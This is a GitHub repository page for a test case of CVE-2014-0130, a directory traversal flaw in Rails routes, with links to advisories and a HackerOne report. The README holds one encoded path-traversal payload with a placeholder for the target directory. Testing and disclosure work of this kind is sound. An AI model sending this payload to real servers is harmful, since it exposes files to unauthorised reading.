Skip to content

omarkurt/cve-2014-0130

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
app
app
 
 
config
config
 
 
db
db
 
 
doc
doc
 
 
lib
lib
 
 
log
log
 
 
public
public
 
 
script
script
 
 
test
test
 
 
vendor
vendor
 
 
.gitignore
.gitignore
 
 
Gemfile
Gemfile
 
 
Gemfile.lock
Gemfile.lock
 
 
README.rdoc
README.rdoc
 
 
Rakefile
Rakefile
 
 
config.ru
config.ru
 
 

Repository files navigation

CVE-2014-0130 Test Case

Payload : site/api/%5C../%5C../%5C../%5C../%5C../{{CAT_DIR}}

Netsparker Detected :

HackerOne

1 - newrelic.com rails directory traversal vuln by droidsec - hackerone.com/reports/134032

Reference

  1. www.openwall.com/lists/oss-security/2014/05/06/12

  2. blog.flowdock.com/2014/05/07/how-we-found-a-directory-traversal-vulnerability-in-rails-routes/

  3. web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0130

  4. matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf

About

cve-2014-0130 rails directory traversal vuln

Topics

ruby directory-traversal cve-2014-0130

Resources

Readme
Activity

Stars

18 stars

Watchers

0 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages